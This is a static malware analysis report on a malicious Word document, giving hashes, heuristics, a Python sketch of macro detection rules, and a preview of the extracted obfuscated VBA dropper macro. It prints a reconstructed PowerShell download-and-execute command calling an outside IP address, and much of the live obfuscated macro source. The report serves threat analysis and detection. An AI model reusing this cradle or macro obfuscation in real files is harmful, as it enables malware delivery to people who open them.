Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 30df69feade4ca93…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 84.2 KB
Created: 2018-06-19 17:50:00
Authoring application: Microsoft Office Word
First seen: 2020-05-25
MD5: bb1c3c4c38c803e3f12c446334ccb131
SHA-1: d549a46a8f252e2396c300faab643041294ec9f0
SHA-256: 30df69feade4ca930c04d3321ba028f7a69e5f60e2b1a3cce05eac288799bd42
Risk score: 242

Malware Insights

MITRE ATT&CK
T1566.001 Phishing: Spearphishing Attachment
T1059.005 Command and Scripting Interpreter: Visual Basic

The sample contains a VBA macro with an AutoOpen procedure that calls Shell(). The macro assembles a PowerShell command from concatenated string fragments and executes it to download and run a script from a remote URL. The reconstructed PowerShell command is: powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://185.143.223.247/a.ps1')". This is downloader or dropper behaviour. Note that this command does not occur in clear text in the extracted macro source: the visible source spells the interpreter name and the IEX alias from string pieces and $PSHome character indexing, and carries the rest of the payload as a separator-delimited numeric string. Confirm the reconstruction against the decoded payload before using the URL as an indicator.

Heuristics (7)

  • CLAMAV_DETECTION (critical): ClamAV signature Doc.Dropper.Agent-6586686-0
    ClamAV detected this file as malware: Doc.Dropper.Agent-6586686-0
  • OLE_VBA_MACROS (medium, 3 related findings): VBA macros detected
    The document contains VBA macro code.
  • OLE_VBA_SHELL (critical): Shell() call in VBA
    The macro calls Shell(), which starts an external process from the document.
  • OLE_VBA_AUTOOPEN (high): AutoOpen macro
    The project defines an AutoOpen procedure, which Word runs automatically when the document is opened (subject to the user's macro security settings).
  • OLE_VBA_PCODE_AUTOEXEC_EXEC (high): VBA p-code auto-exec with execution tokens
    The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents, and documents whose source extraction failed, where no visible source is available.
  • OLE_LEGACY_WORDBASIC_AUTOEXEC (medium): Legacy WordBasic auto-exec macro marker
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample a decoded VBA project was in fact extracted (see Extracted artifacts below), so read this finding as corroborating the AutoOpen marker rather than as an independent indicator.
  • EMBEDDED_URL (info): Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)
    This URL is the standard DrawingML XML namespace identifier carried by embedded Office content, not a network indicator. No download URL appears in this list because the macro builds its PowerShell payload from obfuscated string fragments rather than storing a URL as plain text (see the extracted macro below).
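The two stream-level heuristics above (OLE_VBA_PCODE_AUTOEXEC_EXEC and OLE_LEGACY_WORDBASIC_AUTOEXEC) reduce to a token co-occurrence check over a raw VBA stream. The following Python is added here as a worked example of that logic; it is not the analyzer's own rule code. The token lists are an assumption about what such rules look for, and the byte strings are constructed for the example rather than carved from this sample. Identifiers in compiled VBA streams can appear as ASCII or UTF-16LE, so both encodings are checked.

```python
import re

# Auto-execution and execution token families. The exact lists the analyzer
# uses are not published on this page; these are the usual suspects (assumed).
AUTOEXEC_TOKENS = ("AutoOpen", "AutoExec", "AutoClose", "Auto_Open",
                   "Document_Open", "Workbook_Open", "Workbook_Activate")
EXEC_TOKENS = ("Shell", "WScript.Shell", "CreateObject", "DownloadFile",
               "DownloadString", "URLDownloadToFile", "powershell", "cmd.exe")


def find_tokens(stream: bytes, tokens) -> set:
    """Tokens present in `stream` as either ASCII or UTF-16LE (identifier
    tables in compiled VBA use both), matched case-insensitively."""
    found = set()
    for tok in tokens:
        for enc in (tok.encode("ascii"), tok.encode("utf-16-le")):
            if re.search(re.escape(enc), stream, re.IGNORECASE):
                found.add(tok)
                break
    return found


def classify_macro_stream(stream: bytes, vba_project_recovered: bool):
    """Emulate the two rules. The high-severity finding needs an auto-exec
    token and an execution token in the same stream; the medium-severity
    legacy marker fires on an auto-exec token alone, and only when no modern
    VBA project was recovered (otherwise source-level rules such as
    OLE_VBA_AUTOOPEN cover it). Returns a finding dict or None."""
    auto = find_tokens(stream, AUTOEXEC_TOKENS)
    execs = find_tokens(stream, EXEC_TOKENS)
    if auto and execs:
        return {"rule": "OLE_VBA_PCODE_AUTOEXEC_EXEC", "severity": "high",
                "autoexec": sorted(auto), "exec": sorted(execs)}
    if auto and not vba_project_recovered:
        return {"rule": "OLE_LEGACY_WORDBASIC_AUTOEXEC", "severity": "medium",
                "autoexec": sorted(auto), "exec": []}
    return None


# Constructed sample streams (not carved from the real file):
# 1. a p-code-like stream with a UTF-16LE AutoOpen name plus ASCII and
#    UTF-16LE execution identifiers, and no recoverable source
SAMPLE_PCODE = (b"\x00\x01" + "AutoOpen".encode("utf-16-le") + b"\x00\x00Shell\x00"
                + "DownloadFile".encode("utf-16-le") + b"\xff")
# 2. an old-style stream carrying only the AutoOpen marker
SAMPLE_LEGACY = b"\x00AutoOpen\x00Macro1\x00"
# 3. a harmless stream
SAMPLE_BENIGN = b"Sub Greeting()\x00MsgBox\x00End Sub"

if __name__ == "__main__":
    for name, s, recovered in (("pcode", SAMPLE_PCODE, False),
                               ("legacy", SAMPLE_LEGACY, False),
                               ("benign", SAMPLE_BENIGN, True)):
        print(name, classify_macro_stream(s, recovered))
```

The `break` after the first matching encoding keeps each token counted once; the `vba_project_recovered` flag is what separates the legacy marker from an ordinary AutoOpen finding, exactly as the rule text describes.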

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)   10973 bytes
SHA-256: 29bb6ad5435df5dca1bcc4fd334367bbe083c7bfee20b04e90ad8e58a141abc9
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "PXoQzwzwoUU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "rAfOKTEGsIbEbr"
Function wUDzFVOAv()
On Error Resume Next
VUBHK = CDate(89433)
Efiwpp = CDate(QJKOC + Sin(32927 + 36308) * 69077 * CInt(84378))
BcpKDz = 36476
TArwjE = tNTjH
DtDXZt = 74576
YVPCBl = CByte(FkWYc)
HbAdiC = "Ow" + "erSHe" + "ll .( $PSHome[2" + "1]+$pSHOme[30" + "]+'X')( " + Chr(34) + " $" + "(SeT-varIAble" + " 'ofS' '') " + Chr(34) + "+[s"
iEbVhI = CDate(42375)
Vzutq = CDate(YGoUv + Sin(70282 + 60190) * 94470 * CInt(46183))
NLXBv = 48478
dvfbP = AYBSIM
pptZRl = 42789
VLplc = CByte(nJCwX)
TzzwPYjBLS = "Tring]( '29&" + "125" + "&110{104&111t1" + "05t25-4&25-" + "87%92%78" + "-20t86%91B83%92" + "K90-77}25<75%"
rXwLV = CDate(97905)
CKNLBk = CDate(AHoiOS + Sin(39029 + 28124) * 44412 * CInt(52960))
wuXnj = 39842
LzDPfZ = XvFXab
VCBci = 41860
DnvhjZ = CByte(mdurmw)
qFToFqsI = "88-87<93t8" + "6-84t2<29{8" + "6}114{73t87t" + "11"
obdjMX = CDate(86734)
SmpFB = CDate(mRtZQ + Sin(55256 + 82806) * 88728 * CInt(56232))
pLlVFJ = 44420
GwBUa = zuKAA
HpsldP = 67525
BcAUfK = CByte(cmfnL)
zkRiwuMB = "6<74z2" + "5K4%25{87" + "}92{78%20}8" + "6{91B83K92K90" + "-77%2" + "5<106{64&74&77" + "K9" + "2-84t23t"
ouvBV = CDate(3490)
Ejiwb = CDate(mKqSN + Sin(10783 + 30450) * 44700 * CInt(84043))
LPdoOK = 85207
bMGmA = cQFZj
QTcTN = 99367
Winuz = CByte(aQVYq)
DzIGq = "119B92<77%23K11" + "0<92{91&1" + "22&85<80B92" + "t87t77t2" + "<29&79z87&83" + "-126K109" + "<76t25K4z25z30" + "<81<77{77z73}3z" + "22%22t78z78%"
wUDzFVOAv = HbAdiC + TzzwPYjBLS + qFToFqsI + zkRiwuMB + DzIGq
End Function
Function tvFVBjk()
On Error Resume Next
EOtBil = CDate(88704)
pusQj = CDate(frAWb + Sin(6970 + 59412) * 57065 * CInt(14098))
YrjMjK = 93075
zAEtzn = zpzUd
KEZCMI = 28119
wISafz = CByte(ToOPK)
iEcoJXziGED = "78-23}93t9" + "0K20t77<92&90" + "z81t" + "23-75{76}22{10" + "5}8B85"
mzCApS = CDate(4549)
SUsMp = CDate(ZBXzL + Sin(20332 + 65567) * 73372 * CInt(86662))
Kvirco = 85139
kIarB = GYjjJf
bwalFs = 11607
GLaHGB = CByte(hAXCqu)
WOpBU = "t67" + "-120" + "<114-" + "22-121K81B77}" + "77z73&3{2" + "2}22<78B7"
UjGuu = CDate(24382)
AlZctn = CDate(pwAkD + Sin(79710 + 6391) * 89289 * CInt(92642))
uMZHw = 99684
JZIKSi = GPruOG
MlDCsK = 31793
ijsAG = CByte(QjrKzd)
bPijD = "8t78-23" + "<93z92&87&80{" + "67{92<84{8" + "5&88t82<9&15z" + "23{90{86t84}22" + "K13{92z77}" + "83{105z65t105{2" + "2<121B81t"
dvMap = CDate(41147)
RlABl = CDate(CGijh + Sin(83399 + 1552) * 18764 * CInt(54591))
SZbkr = 49771
Viqtqh = UpLud
NAuVC = 59417
nLZjPl = CByte(ElhCw)
jpEPTihMt = "77t77&73" + "B3B22" + "<22{78%78t78&23" + "<8" + "0%80{90B74B93" + "-92<8" + "5t81}80K23<86z" + "75<94t22" + "&65" + "&93%110t64&"
jSfMaf = CDate(47930)
VinVwi = CDate(VzjALb + Sin(23793 + 32235) * 40075 * CInt(57830))
KXwqi = 29980
hcIWE = uVvifL
KJhAS = 25128
BALwM = CByte(Orwwb)
jMqiAUfV = "124z" + "113B2" + "2-121t81z" + "77" + "B77" + "t73z3<22&22K78B" + "78z78<23K82&7"
bdjrql = CDate(16954)
BuMzHo = CDate(zCPco + Sin(94902 + 57505) * 30078 * CInt(46029))
zhattP = 97391
UdLNNH = oWOVw
CIGJOL = 21673
FXCKi = CByte(zwZwi)
KwicNGaUzd = "7-88%94-81" + "}88" + "K8" + "7%88-23K" + "90z86K84&" + "22t87%64}" + "110%9{10" + "4K22z12" + "1B81B77K" + "77K"
KJlZsB = CDate(37189)
UhnPE = CDate(cRjMO + Sin(38249 + 93322) * 61475 * CInt(95851))
Cuwwt = 20223
RHmYjA = haXBu
UFwaz = 3546
qtzNL = CByte(WHzcn)
Nqiojd = "73t3" + "K22K22B78t78t78" + "t23B94{76-75t7" + "6B88-87}9" + "3%9" + "0%86<23}8" + "0K87<22"
TYGojL = CDate(65244)
OGRtw = CDate(pWjwnq + Sin(53834 + 55070) * 45849 * CInt(37719))
FiJzi = 8575
hWiHM = hfRij
ucnADJ = 58667
lNUqi = CByte(JHkPu)
YQOZDjj = "<9-83-94" + "}94B91-85" + "{111B22{30" + "z23t106}73&8" + "5%80}77"
hvFXo = CDate(40989)
pYTtYj = CDate(WLVoiG + Sin(51464 + 24304) * 84448 * CInt(67239))
arAWmY = 74
... (truncated)